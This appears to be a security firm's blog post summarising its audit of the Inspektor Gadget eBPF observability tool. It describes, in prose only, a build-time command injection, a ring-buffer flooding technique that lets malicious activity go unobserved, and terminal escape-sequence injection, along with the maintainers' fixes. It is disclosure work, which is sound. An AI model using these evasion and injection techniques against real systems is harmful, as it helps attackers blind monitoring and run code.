In early 2026, Shielder was hired byOSTIFto perform a security audit ofInspektor Gadget, an eBPF-based framework that provides powerful and flexible observability tools for Kubernetes and Linux hosts. Today, we are publishing thefull reportin ourdedicated repository. Inspektor Gadget is both a framework and a toolkit to enhance observability on a Linux machine/Kubernetes node, using the eBPF technology. Inspektor Gadget manages the packaging, deployment and execution of “gadgets”, which are essentially eBPF programs encapsulated in OCI images. Gadgets export events that are caught by the tool and that can be filtered, sorted, exported or enriched. See it in action: Before starting the audit, we sit with the maintainers for a collaborative threat modeling session. With open source projects, we have found this to be crucial: just looking at the code often does not yield the most interesting information, that is,how end-users install, configure and use the project. As a result, two main points emerged: With these attack scenarios in mind, we have performed the audit by combining manual and AI-assisted analysis, dynamic testing, and usage of SAST tooling such assemgrepandgosec. While auditing, we have discovered three vulnerabilities (two with Medium severity, one with Low) that we reported through the projectGithub Securityportal: Command Injection inig build Inspektor Gadget provides the tooling to build, push and pull custom gadgets (https://inspektor-gadget.io/docs/latest/gadget-devel/). The building flow usesMakefilevariable interpolation, which is prone to command injections, if an attacker controls some of the variables that are used to build new gadgets. This could be leveraged by attackers, for instance, to gain code execution in CI/CD runners. The severity was set to Medium/Moderate, given the added complexity of controlling the build variables. The maintainers fixed this in versionv0.51.1by refactoring the building process to use Golang machinery rather than Makefiles. Denial of Service via Event Flooding Inspektor Gadget captures all the events coming from deployed gadgets in a single kernel ring-buffer, with a size that is hard-coded to 256KB. When the gadgets push more events than what the user-space collector can handle, this buffer can be filled completely, leading to new events being dropped. Inspektor Gadget silently ignored those dropped packets, which would allow an attacker to first produce many harmless events to flood the buffer, and then perform malicious operations that would not be caught by any gadget. The severity was set to Medium/Moderate, as this only affects the integrity of the observation pipeline. The maintainers fixed this by implementing a map of dropped packets to detect when events are being lost, so that users can build alerts on top of this limitation. Unsanitized ANSI Escape Sequences in Columns Output Mode When displaying gadget events through a terminal using the default output formatter, there was no sanitization of control characters of ANSI escape sequences. Therefore, an attacker in a container could craft malicious events (for instance, by opening/creating files with controlled names) to inject these in the terminal. The impact depends on what terminal is used - at the very least, it could be used to inject new logs or delete existing ones. The severity was set to Low, as this already required a compromised pod in the cluster, and the exploitability highly varies on the terminal used. The maintainers fixed this by sanitizing the text before sending it to the terminal. Hardenings During the audit, we gathered some recommendations for the project to improve its security posture: Gadget Bypasses